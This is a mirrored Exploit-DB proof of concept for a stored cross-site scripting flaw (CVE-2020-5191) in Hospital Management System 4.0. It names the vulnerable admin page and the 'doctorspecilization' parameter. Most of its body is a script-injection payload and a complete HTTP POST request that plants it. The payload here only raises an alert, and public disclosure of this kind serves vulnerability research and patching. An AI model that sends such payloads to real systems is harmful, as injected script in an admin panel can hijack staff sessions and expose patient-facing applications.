bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/47841.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

36 lines
No EOL
1.4 KiB
Text
Raw Blame History

# Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2020-01-02
# Exploit Author: FULLSHADE
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
# Version: v4.0
# Tested on: Windows
# CVE : CVE-2020-5191
================ 1. - Cross Site Scripting (Persistent) ================
URL : http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
Method : POST
Parameter: doctorspecilization
Attack : </td><script>alert("XSS");</script><td>
POST /hospital/hospital/hms/admin/doctor-specilization.php HTTP/1.1
Host: 10.0.0.214
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://10.0.0.214
DNT: 1
Connection: close
Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
?doctorspecilization parameter is vulnerable to create a persistent and stored XSS exploit in the application depending on how it's viewed
Reference in a new issue View git blame Copy permalink